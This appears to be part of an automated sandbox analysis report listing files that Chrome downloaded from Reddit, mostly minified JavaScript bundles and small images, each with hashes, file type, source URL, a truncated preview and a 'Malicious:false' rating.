                                                  Preview:import{Y as o,_ as r,e as t}from"./shell-4994f581.js";import{a}from"./icon-4d9be652.js";import{T as p}from"./tooltip.base-aa9be46d.js";var l=a`${o}:host{--max-width:20rem;--hide-delay:0ms;--show-delay:150ms;display:contents}:host,:host([appearance=neutral]){--rpl-tooltip-code-background-color:var(--color-neutral-background-hover);--rpl-tooltip-background-color:var(--color-neutral-background);--rpl-tooltip-color:var(--color-neutral-content-strong)}:host([appearance=inverted]){--rpl-tooltip-code-background-color:var(--color-inverted-neutral-background-hover);--rpl-tooltip-background-color:var(--color-inverted-neutral-background);--rpl-tooltip-color:var(--color-inverted-neutral-content-strong)}:host([appearance=primary]){--rpl-tooltip-background-color:var(--color-tooltip-bg-primary);--rpl-tooltip-color:var(--color-tooltip-text-primary)}.tooltip{--arrow-size:var(--rpl-tooltip-arrow-size, 4px);--arrow-color:var(--rpl-tooltip-background-color)}.tooltip[placement^=top]::part(arrow){box-shadow
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:GIF image data, version 89a, 1 x 1
                                                  Category:downloaded
                                                  Size (bytes):42
                                                  Entropy (8bit):2.9881439641616536
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D89746888DA2D9510B64A9F031EAECD5
                                                  SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                  SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                  SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://alb.reddit.com/i.gif?za=U1PIwb8qAqaOqN1LQsbCbYhAlXBhPZMbqlxdM5vX9bL6nMfmxouVcYPPDCy3px7Et3tM3rkvhrHJq1hEUza0-bSWm0Ycy2MN4SjtYmQHQcMawNRGTP2RmG9QQ-fiz9pv7mDAiygmP6EldFgGLVZGI2Y9g5M1x2-4_6UxAdDsoaC481I4nTtoZxQyO-YZw8D7BPFC775SBb4SxmceSsVQjapRAI0uuasqKVLzxkiD9NQh7K6cNg2X&zp=4cXXzHWq3Vmjel5C_wCpiFjWkTGO24SmsZ4jxlw8X4KiluzbpXG8EVDDmCHRX5BcR7nQbrf6-BOuvRWZH3qkRHfyuc5sRcbbYRfO-19j-dsE0CZSBVns-0p670PvQA&a=0&b=0&be=0&c=0&d=0&e=0&ea=0&eb=0&f=0&r=0&g=0&i=1745344522916&t=1745344522916&o=0&q=0&h=0&w=0&sh=1024&sw=1280
                                                  Preview:GIF89a.............!.......,...........D.;
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):359
                                                  Entropy (8bit):4.981642786974691
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5CB6ED7A39D0022AB88B2B2700840474
                                                  SHA1:75A3128594372E54A7EFDD60413F4E543644524A
                                                  SHA-256:84B0863230D078AA27E180D7E2FF4F33C54C9CF0128AB6D0CFDEE9323C2B8F6A
                                                  SHA-512:46F727E4F2A2B0C06D3A69B5CF5482A164ED57FDD6B2819AD807156A16568EA589C1AE2BD3620BE3E45ECA2A48B4B2AB012D1AA1E64085E4727D16717BA9E3AC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/compact-post-community-recommendations-client-js-8648402c.js
                                                  Preview:import"./community-card-aba01d4b.js";import"./show-more-grid-51791b3c.js";import"./shell-4994f581.js";import"./shop-gallery-data-fetcher-client-js-a66aa4d3.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./icon-4d9be652.js";import"./number-68db534b.js";.//# sourceMappingURL=compact-post-community-recommendations-client-js-8648402c.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (4441)
                                                  Category:downloaded
                                                  Size (bytes):4500
                                                  Entropy (8bit):5.254201578437543
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F76602C9423F1FCB1D848FD05E62AA37
                                                  SHA1:C7AE69E00934A8E05DB43D35E3A8795A5E4CADEB
                                                  SHA-256:1C829D29749C501193757E888511F4E503D171ACF185279E97266598CE56B7EC
                                                  SHA-512:A1A6302E6F3868AC2D91EDBFC53AD77CE17F1431B5968EFE06C97F3079078E55817FF5385EB07949BC7AAB498BA4FD9417370E2874F3078C413DFC850836C3D4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/left-nav-top-section-7736257e.js
                                                  Preview:import{G as e,_ as t,n as s,e as i,t as o}from"./shell-4994f581.js";import{s as a,x as r,a9 as n,aa as l,ab as p,ac as c,ad as d,ae as u,af as h,ag as y,ah as g,ai as k,aj as f}from"./icon-4d9be652.js";import{l as b,L as m}from"./expandable-section-header-e3f969c2.js";import{a1 as v}from"./club-award-confirmation-client-js-b22d6f4f.js";import"./guides-entrypoint-tooltip-5b8e1fc8.js";var x;!function(e){e.guides="/answers/",e.home="/?feed=home",e.popular="/r/popular/",e.all="/r/all/"}(x||(x={}));const L=[e.Guides,e.GuidesConversation];let T=class extends a{constructor(){super(...arguments),this.home=!1,this.popular=!1,this.explore=!1,this.all=!1,this.guides=!1,this.chat=!1,this.isBot=!1,this.isDesktop=!1,this.country="US",this.guidesTooltipExperiment=!1,this.renderHomeLink=()=>{const t=this.selectedPageType===e.Home;return r` <faceplate-tracker source="nav" action="click" noun="home" class="visible"> ${$({attributes:{id:"home-posts"},href:x.home,label:"Home",leadingIcon:t?n():l(),selecte
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (15146)
                                                  Category:downloaded
                                                  Size (bytes):15209
                                                  Entropy (8bit):5.186916559216353
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2AE774CCBEE9B231BA4309685C5B9074
                                                  SHA1:3C95B0956F2C95EDC4DEE95CF72141844C2F358B
                                                  SHA-256:7EDFFA3EFD43B143437964A4198DF12A6572B397304C880D7269A32C6B2DEC16
                                                  SHA-512:FEDDC32F6FA6C61D20E089CD57B2087701E261C508ADC4BC6FC2454E6219B825CDC23A32243C2DEA14BFD39DB12A972E7D7E5945E284F606D6E337B46B220B31
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-post-translator-9cb3ecae.js
                                                  Preview:import{a as t,aw as s,P as e,es as i,T as a,et as n,t as r,_ as o,n as l,av as d,g as h,l as c,L as p,ax as u,e as v,bK as m,dx as T,dA as b,bm as y,ah as P,dD as g,bN as f,dy as A,dB as C,c as E,dC as S,eu as I,ev as M,ew as V}from"./shell-4994f581.js";import{B as x}from"./base-translator-b41f5754.js";import{P as D,p as w}from"./links-27a3f3ef.js";import"./translation-feedback-modal-client-js-8ce911d1.js";import"./translation-intervention-modal-db1a7e08.js";import{A as B,x as O,bu as k,I as F,c as L,s as q}from"./icon-4d9be652.js";import{o as N,p as $,q as R}from"./translations-13fc818b.js";import"./banned-user-banner-client-js-feaea128.js";const j={get:()=>{if(!c.isAvailable())return;const t=c.getItem(p.I18nPostTranslationBanner);return t?JSON.parse(t):void 0},set:t=>{c.isAvailable()&&c.setItem(p.I18nPostTranslationBanner,JSON.stringify(t))},update:t=>{const s=j.get()||{};j.set({...s,...t})}};let _=class extends(t(q)){constructor(){super(...arguments),this.isImmersiveVisit=!1,this.is
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1597)
                                                  Category:downloaded
                                                  Size (bytes):1657
                                                  Entropy (8bit):5.271105626896426
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:A93E0D900DDECDE81B49980CD3A63CDE
                                                  SHA1:CEFFAB73B743B45D98DFC99CA89BC392C3D7F9FB
                                                  SHA-256:9A6EEDCDE463EE7F27DAA95788EC34DA6AD4DE91721C76C7B21F42370738F4E1
                                                  SHA-512:385F3236E865E46208878A6BDB4B081DC9E497C68C6B0A833D7C5F4F99E956BED44C1559A8F11A65CAE4839CDD8EF60AFF4CC5AB66A99ABEA918A5B77A725F78
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/content-action-button-5fdf727f.js
                                                  Preview:import{I as e,g as t}from"./icon-4d9be652.js";import{v as a,aB as s}from"./shell-4994f581.js";const n="plain",r="plain-weak",o="secondary",l="bordered",m="media",d="plain",i={[a.ExtraSmall]:e.ExtraSmall,[a.Small]:e.Small,[a.Medium]:e.Medium,[a.Large]:e.Medium},c={xs:"px-sm",sm:"px-sm",md:"px-sm",lg:"px-xs"},p={xs:"text-12",sm:"text-12",md:"text-12",lg:"text-14"},b={xs:"var(--size-button-sm-h)",sm:"var(--size-button-sm-h)",md:"var(--size-button-md-h)",lg:"var(--size-button-md-h)"},u={xs:"var(--font-button-sm)",sm:"var(--font-button-sm)",md:"var(--font-button-sm)",lg:"var(--font-button-md)"},x={[n]:"button-plain",[r]:"button-plain-weak",[o]:"button-secondary",[l]:"button-bordered-cab",[m]:"button-media-cab"},$=e=>{const{attributes:t,size:a,appearance:s,selected:n}=e;return[t?.className||"",a?`${p[a]}`:"",x[s??d],n?"button-activated":"","inline-flex items-center"].join(" ")},f=({attributes:e,children:n,size:r=a.Medium,selected:o,appearance:l=d,leadingIcon:m,screenReaderContent:i,role:p})=
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):394569
                                                  Entropy (8bit):5.429255610949383
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:275C04B81E7E923BC641BEE9B17FC195
                                                  SHA1:8CDB0FB3F65B7B40ABE7A966563FB1BC685ED61F
                                                  SHA-256:4FA3E15A808F5241E957C2DF7ED9793497F30C5940AFEB3B7B1880BC2CA49E7E
                                                  SHA-512:A794354C979DDE69D94048F49E68F254059CDD5B699EE0C488414AC0004DCC616FF585EA9DF92402FD08CC6B57F439B766FA5AD41E85F9BE59D15920152A1E01
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/hls-29122692.js
                                                  Preview:function t(t){return t&&t.__esModule&&Object.prototype.hasOwnProperty.call(t,"default")?t.default:t}var e,s,i,r,n,a={exports:{}};e=/^(?=((?:[a-zA-Z0-9+\-.]+:)?))\1(?=((?:\/\/[^\/?#]*)?))\2(?=((?:(?:[^?#\/]*\/)*[^;?#\/]*)?))\3((?:;[^?#]*)?)(\?[^#]*)?(#[^]*)?$/,s=/^(?=([^\/?#]*))\1([^]*)$/,i=/(?:\/|^)\.(?=\/)/g,r=/(?:\/|^)\.\.\/(?!\.\.\/)[^\/]*(?=\/)/g;var o=a.exports=n={buildAbsoluteURL:function(t,e,i){if(i=i||{},t=t.trim(),!(e=e.trim())){if(!i.alwaysNormalize)return t;var r=n.parseURL(t);if(!r)throw new Error("Error trying to parse base URL.");return r.path=n.normalizePath(r.path),n.buildURLFromParts(r)}var a=n.parseURL(e);if(!a)throw new Error("Error trying to parse relative URL.");if(a.scheme)return i.alwaysNormalize?(a.path=n.normalizePath(a.path),n.buildURLFromParts(a)):e;var o=n.parseURL(t);if(!o)throw new Error("Error trying to parse base URL.");if(!o.netLoc&&o.path&&"/"!==o.path[0]){var l=s.exec(o.path);o.netLoc=l[1],o.path=l[2]}o.netLoc&&!o.path&&(o.path="/");var h={scheme:o.sc
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1826)
                                                  Category:downloaded
                                                  Size (bytes):1883
                                                  Entropy (8bit):4.993433591361988
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:7E2DE0153B920E8E12DCD0BC113DC847
                                                  SHA1:32490832B9A2651C9EC303368EDAA8219DDAF44B
                                                  SHA-256:AA041F159CBAC5D4A7E1510CF2AAA2625499F15EC7ACF33A44F44CC4F455F329
                                                  SHA-512:171EE4A590AB2D247BFB309E2E3EB800BEEB3A01A57E95001C816FA3E3CE02547CB415B6F6B61299766FF3208650A7BA4B8FB4A8993B48F148F04A958E7F9589
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/distinguished-tags-28b29a34.js
                                                  Preview:import{fj as o}from"./shell-4994f581.js";var e,t,n;!function(o){o.AddRemovalReason="mod-add-removal-reason",o.IgnoreReports="mod-ignore-reports",o.UnignoreReports="mod-unignore-reports",o.Distinguish="mod-distinguish",o.Undistinguish="mod-undistinguish",o.Sticky="mod-sticky",o.Unsticky="mod-unsticky",o.Lock="mod-lock",o.Unlock="mod-unlock",o.ApproveContent="mod-approve-content",o.RemoveContent="mod-remove-content",o.RemoveContentAsSpam="mod-remove-spam-content",o.ConfirmRemoval="mod-confirm-removal",o.RemoveContentMenu="mod-remove-content-menu",o.MarkNsfw="mod-mark-nsfw",o.UnmarkNsfw="mod-unmark-nsfw",o.MarkSpoiler="mod-mark-spoiler",o.UnmarkSpoiler="mod-unmark-spoiler",o.AdjustCrowdControl="mod-adjust-crowd-control",o.OpenEditPostFlairModal="mod-open-edit-post-flair-modal",o.SnoozeReporter="mod-snooze-reporter",o.UnsnoozeReporter="mod-unsnooze-reporter",o.UpdateHighlightedPost="mod-update-highlighted-post",o.RemoveHighlightedPost="mod-remove-highlighted-post",o.ApproveContentOptimisti
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (6279)
                                                  Category:downloaded
                                                  Size (bytes):6331
                                                  Entropy (8bit):5.034650305804937
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:80FF6C85860EBF3CC2DA338E64DB64E6
                                                  SHA1:5C4675070A5E3A18354E01E43EA290DBDC690FAD
                                                  SHA-256:233D0EE8F5D7BB370C1681D731FE94888D84C50D6793B14C42784262F3AAC1C4
                                                  SHA-512:E2288430FD34D432311DAE707176368AFA4C78F8AA621CE4FE81F76537A18B2667303AFE421D3F0C34576EEF2B0BB8A952C1CF0327E5AAFC690665CDAB5CFF1F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/filterNullish-3e68f24c.js
                                                  Preview:import{gW as t,_ as i,n as e}from"./shell-4994f581.js";import{a as s,x as a,s as n}from"./icon-4d9be652.js";import{h as r,F as l,c as o}from"./index-169ed00b.js";class d{constructor(t,i,e,s,a,n,r,l,o,d){this.valueMissing=t,this.typeMismatch=i,this.patternMismatch=e,this.tooLong=s,this.tooShort=a,this.rangeUnderflow=n,this.rangeOverflow=r,this.stepMismatch=l,this.badInput=o,this.customError=d}}class c{constructor(t){this.submissionValue=null,this.constraintsSuffered={},this.customValidityMessage="",this.validityMessage="",this.validationAnchor=null,this.target=t,this.input=document.createElement("input"),this.input.className="faceplate-internal-input",this.input.tabIndex=-1,this.input.style.opacity="0",this.input.style.width="1px",this.input.style.height="100%",this.input.style.padding="0",this.input.style.border="0",this.input.style.pointerEvents="none",this.input.hidden=!0}_connect(t){t?(this._form=t,r.register(t,this.target)):this._form=void 0}_disconnect(){this._form&&(r.unregister(
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image
                                                  Category:downloaded
                                                  Size (bytes):2196
                                                  Entropy (8bit):7.8664716720853916
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:237EFEE1F9A604B5F2D17E0AEECE4753
                                                  SHA1:F8E821CA0E9BDC7B673E85B4BD78E7546248C002
                                                  SHA-256:CFF84EA6106057F4E448AED6396DC7D98CDA4D25F52ADB3F86F66BAA12D99055
                                                  SHA-512:E25C07471F5702763D3B07F404890D8083879F0F433C46431493CCB70D79A1DD462DC451024A3C20105C2C503FC77734C75D3D2946E0FBA07A79F577A2C4EFF3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:"https://styles.redditmedia.com/t5_2uqcm/styles/communityIcon_kfqpkjbvpv001.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=871296ce8664f6ad7c584164a1c901a823641c56"
                                                  Preview:RIFF....WEBPVP8X......../../..ALPH......vk....z&).m.m.m.m.m.n.t......F......Hb.M.\.6.ib_....c.R....L...34M.p.R...k..{.{.C....O~.O....'...Q....x|1.h.e.%*..?..N../.;.G_......s.....|O..$.s7.$iwr...DD4.^M$i....<'.h...b.-S..c._..}'.(w.......Y.....~..s.../~<y..... _"..,.s.N..W...?.R...A:......k].0h.R.ABWa....6.D].X.Q@8.B..A...g.d..m..-.={.N..F*.. H. u'._...n.h.k..q'...A..p.T....N.Q....U..=..........@...........>..OT..... ...;@..=h..6Zu....*4. A..a.@...5M....`.e./P.Ta&...4..0$}.\f..._.k=u.$.(.......b....r..5........}.$iz...(.h...i.j.`..gH..%.[q...."..Q..)....X....J.....*....A.f.0c.k..Z.b_.......^..h.a...H)"6OZ....X..a...v..<.*Z.....R.".'YEDl.R.._k...7.`....nv3-[...W|..EP..@D......._..V...'.....+V.w.P..B.$@.....f......C......:H.|.*..I."}/...............pn1M4.>I*.....A...66.7.?..T......$...&....p'...2........@.d3{.@. ...H*g.....i.f"i.9.......[;W,X...g....T..F<.....R...R.d.c..<[.O..<..u..-D.;....g[.j._9.(...X^H..J.*.d}..^KRm.....;..?.x.o._.qkx6.0^.f.gl..<
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 40 x 40, 8-bit colormap, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):1748
                                                  Entropy (8bit):7.7271966751352785
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:292E60D08F8E5235BA687D529DC9FD9F
                                                  SHA1:4D557D2E70C7D2101CD6387D57897C6AA6A45566
                                                  SHA-256:5C386D159A849D3EC0ECC0872B9A4337B0E2F346805B0C6FC30397C83F892F70
                                                  SHA-512:DB2DA3511140BAAA5EAC51FE6AEFB890D07E882A31E9CBC605097FDA43E0E2873D69AECC0765BD43CD9488A2D906544B2AFAC3274B4600BCF61D8C0B65D9E62A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/marketplace-assets/v1/core/awards/helpful_v1_40.png
                                                  Preview:.PNG........IHDR...(...(...... H_...yPLTE....Y..U..Y..Z..Y..Y..X.....\..Z..X..Z..Z.....Y..Z..X..Y..Z..Z..Z........./..........................Z..Y.......Y....Y...........Y.....Y......U....s...L.i...O..A..S..H.....D.....*...............=........".......]...b..5.-.....:..'..%.#.r..`.....F..2.'....a.....f.....q...w..p../.z...........^..P..8.7.v.....[.....a..x.......i..R..P.A.1................y.....o.......}..F..?..1..1.1.(.........h..f..d..i..}..m.....}..s..m..\..U.S..K..<.<..4./.*.)..(..(..$..#.!.!.. . ..............................s.............o..n.........x..h..h..^..O..I.E.@..>.;.. ................a..........o..v.x.L....tRNS.....`P.@@0 .p...@..`_ ..................p_.v"\.....IDAT8..u..Q..pfA...}g.a.R\Q..Z..puY]WpWw........>..^.....9.x.9..3.?..F@+u#...>.......X...a....k.....2.o....R.x......FS..oN..^.K.j....Z.].V.o..pW...8.....Q......Uz3..........1..PG)VJ.W.....1]..........\!.mK......V..*K.......g.U....F..."...X..B"r
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1835)
                                                  Category:downloaded
                                                  Size (bytes):1892
                                                  Entropy (8bit):5.206510056067489
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DF75DCB47D833FEF0B4DF3B2BEC8946D
                                                  SHA1:2E6F063DDFC84E31EE182C418E559FFA39EE713D
                                                  SHA-256:A2CD68A82B9F2955002BCFE36F37C6E97332029AB188C371FA84E5EED19C1326
                                                  SHA-512:0B53F37F3AFCA38D56D9009A5F55EA588135060ACB05157D375125BA3315307A2EA83F63E26F53B9A8B3F702FEDBA7425E66709498904FFC333696F7AACC4AF4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/faceplate-progress-9c742d06.js
                                                  Preview:import{_ as t,n as s,e as r}from"./shell-4994f581.js";import{s as e,a as o,x as a}from"./icon-4d9be652.js";var c;!function(t){t.Error="error",t.Success="success",t.Incomplete="incomplete"}(c||(c={}));const l=n(16);function i(t,s){return t-s/100*t}function n(t){return 2*Math.PI*t}let u=class extends e{constructor(){super(...arguments),this.value=0,this.status=c.Incomplete}static get styles(){return o`:host{--loader-size-base:var(--rem40);display:inline-block;position:relative}:host([status=incomplete]){color:var(--color-neutral-content,var(--color-tone-1))}:host([status=success]){color:var(--color-success-content,var(--color-alert-positive))}:host([status=error]){color:var(--color-danger-content,var(--color-alert-negative))}svg{height:var(--loader-size,var(--loader-size-base));width:var(--loader-size,var(--loader-size-base));fill:none;stroke-width:8;display:block}.bg{stroke:var(--color-neutral-content-disabled,var(--color-tone-3))}.track{stroke:currentColor;transition:.35s stroke-dashof
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (3008)
                                                  Category:downloaded
                                                  Size (bytes):3074
                                                  Entropy (8bit):5.426289953154947
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:BA01A070ADCB7D723FA7AD47BC1B8AC2
                                                  SHA1:B4BF13CF70BA17EDFCDE832D1FC5C063CFFA7470
                                                  SHA-256:62604A7FE8C0774B4607045948BE5750D00052D27CC63BC163C55719D3E31F8A
                                                  SHA-512:D52256AE8956A3151C9475506BB6A528AD8A0DCB2722380CDBE35717DD9408BB4D2A3AE29AC577C95DC91D75D94D22BDD26B9DD6FBD76EB0B9455FF7DF53225F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/trending-carousel-client-js-a7af9692.js
                                                  Preview:import"./shreddit-gallery-carousel-b1446655.js";import"./ad-event-tracker-a5a98fc1.js";import"./shreddit-dynamic-ad-link-fcaf1820.js";import"./suggested-search-queries-client-js-fb46eb9d.js";import{a as t,t as e,_ as i,n as r,b as n,e as a}from"./shell-4994f581.js";import{g as s}from"./index-56e4320e.js";import{a as o,s as c,x as d,l as m,A as p}from"./icon-4d9be652.js";import"./community-club-highlights-client-js-c7c6ec6d.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./index-e6388eb1.js";import"./gallery-74f99861.js";import"./links-27a3f3ef.js";import"./with-ad-observer-5931d8eb.js";import"./ssa-parser-f2f362d6.js";import"./errors-98e883e2.js";import"./overflow-menu-actions-fd509c7d.js";import"./distinguished-tags-28b29a34.js";const l=`${CLIENT_CONFIG.STATIC_BASE_URL}assets/moments/arena/`,g=t(c);let h=class extends g{firstUpdated(){const t=n({source:"trending",action:"view",noun:"arena_event"},{arena_info:{id:this.arenaEvent?.id||""}});this.trackEvent(t)}_competi
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1928)
                                                  Category:downloaded
                                                  Size (bytes):1977
                                                  Entropy (8bit):5.217194943420465
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B324E1684DC6177EACAD5D5349BC1093
                                                  SHA1:EE4CA96DA1929FF5F7F1FC2E62DAB1E39F9199A7
                                                  SHA-256:451B109F7E0A61DF3E0DE3313352F158DE91E8C9779BCA921D91D5A150852CCA
                                                  SHA-512:F4BCBAB0C35E4774C2D6180A2C8FD4069ACC5F0B070455999FC091BC453537A20430C70D18D2FC155590B9DE362811250ED5121823EC43D673226AE60A3AEEB6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/google-api-d2fdd9a3.js
                                                  Preview:import{x as e}from"./club-award-confirmation-client-js-b22d6f4f.js";import{aT as t}from"./shell-4994f581.js";var i;class s{constructor(e,t){this.host=e,this.uxTypes=t,this.host.addController(this)}static initialize(){return this.initializePromise||(this.initializePromise=this._initialize()),this.initializePromise}static async _initialize(){try{await e(`script#${t}`)}catch(e){return void window.Sentry?.captureException?.(e)}try{window.google.accounts.id.initialize({client_id:CLIENT_CONFIG.GOOGLE_SSO_CLIENT_ID,callback:this.onGoogleCredentialResponse,itp_support:!0,auto_select:!0,cancel_on_tap_outside:!1,use_fedcm_for_prompt:!0})}catch(e){window.Sentry?.captureException?.(e)}}static registerListener(e,t){for(const i of e){const e=this.listenersByUX[i];e.includes(t)||e.push(t)}}static deregisterListener(e,t){for(const i of e){const e=this.listenersByUX[i],s=e.indexOf(t);s>-1&&e.splice(s,1)}}static parseCredentialResponse(e){const t=e?.credential;if(!t)throw new Error("No credential in res
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (7952)
                                                  Category:downloaded
                                                  Size (bytes):8019
                                                  Entropy (8bit):5.234434868871959
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F9246A1C4B2688F34C609DC44073FB48
                                                  SHA1:003AFF38A180A1E3B2AC000C7F129D5D2C5307E8
                                                  SHA-256:6BFDC06D851B90DFF26FB10B401E82452B62331774F823A523412CF45B533A4A
                                                  SHA-512:0E6CF5CFE3C4A3D7BD373DC303C824DFA2CCD0D1378D82BDE4DC139376BC6A5CF0F227745AF94111BE9E35121E4F34E60B4FA3A709073013E579166777A4B6AA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/chat-mobile-xpromo-client-js-58e17cee.js
                                                  Preview:import{_ as e,g as t,aR as r,h0 as o,a3 as n,c9 as i,h1 as a,am as l,I as s,e as d,K as c,h2 as u,O as h}from"./shell-4994f581.js";import{x as p,l as m,a as g}from"./icon-4d9be652.js";import{bn as f,bm as y}from"./club-award-confirmation-client-js-b22d6f4f.js";let b=class extends o{constructor(){super(...arguments),this._fullscreenBlurEl=document.createElement("div"),this._appliedBlurFilter=null,this._blurElement=null,this.shouldContentScroll=!1,this.isFooterEmpty=!0,this.render=()=>{const e=p`<slot name="closeButton" class="${n({floating:this.shouldContentScroll})}"></slot>`,t=p`<div id="header" class="${n({"with-icon":this._titleGraphic.length>0})}"> <slot name="titleGraphic"></slot> <slot name="title"></slot> </div>`,r=p`<slot name="primaryButton" @slotchange="${this.calcFooterChildren}"></slot> <slot name="secondaryButton" @slotchange="${this.calcFooterChildren}"></slot> <slot name="tertiaryButton" @slotchange="${this.calcFooterChildren}"></slot>`;return p` ${i(this.modal?"\n <sty
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (27793)
                                                  Category:downloaded
                                                  Size (bytes):27836
                                                  Entropy (8bit):5.538014005434745
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0D4D1A491BFE356FFA261453B20B88CC
                                                  SHA1:B56C48318F8DA96E0B88CB7ABCAB9CD38A8D2D44
                                                  SHA-256:01D2C5C5B79DA5016074D2BCC4878E639CC13BCAD4C270A43C19BDEEE02B0388
                                                  SHA-512:586EE30E33FC7C767D8811F79FBCF7ED6819F22FBCC4A27FB843F0FF1AFCD5E66265491D3E7473065F5B5EAAC4E5A17BE173D65383A0CA9D77504BAE6CA84B4B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/base-562ac292.js
                                                  Preview:import{aj as e,L as t,ft as r,N as a,aD as s,Z as i,aL as n,K as o,fu as c,G as h,fv as d,aF as l,t as u,J as p,T as y,bo as m,fw as f,O as S,fx as g,fy as b,fz as w,a3 as v,u as D,v as R,fA as E,_ as I,g as k,fB as C,n as $,I as x}from"./shell-4994f581.js";import{I as T,x as U,an as q,u as A,bO as _,a5 as L,aI as N,K as Q,A as P,bP as O,aX as B,s as F}from"./icon-4d9be652.js";import{p as j,d as M,bB as G,as as Y,bC as z,B as V,a2 as K,ai as J}from"./club-award-confirmation-client-js-b22d6f4f.js";import"./search-input-desktop-client-js-cb5b0267.js";import"./search-results-dropdown-modifier-client-js-b0d36951.js";import"./search-typeahead-expandable-section-1d8b2dde.js";import{s as H,S as Z,a as X}from"./search-params-246786c0.js";import{S as W,a as ee,b as te}from"./search-dynamic-id-564febdb.js";import{l as re,L as ae}from"./expandable-section-header-e3f969c2.js";import"./ad-event-tracker-a5a98fc1.js";import"./shreddit-dynamic-ad-link-fcaf1820.js";import"./suggested-search-queries-cli
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):298
                                                  Entropy (8bit):4.943770216112988
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6F574CEC704D182048747FAFDF5EC9DA
                                                  SHA1:7368013B100517F7A6A8364D493087C6C8CD7E57
                                                  SHA-256:27012D6F77709787CFF6CB35950AB3B714E61AEF0DAEF93742F76EA5130A30DA
                                                  SHA-512:06D7860511AB93CE6690076B9D1B28635E9BEDFAF88FF0A9BA8B9C2C198619E4092B38C5B1E020783AC1C1D1E30FC5D2971F14159A4D87F9DD3A46F393C40220
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/header-action-item-user-drawer-client-js-f5ed6821.js
                                                  Preview:import"./shell-4994f581.js";import"./header-action-item-chat-client-js-98797a42.js";import"./icon-4d9be652.js";import"./subreddit-posting-eligibility-cf0ca862.js";import"./club-award-confirmation-client-js-b22d6f4f.js";.//# sourceMappingURL=header-action-item-user-drawer-client-js-f5ed6821.js.map.
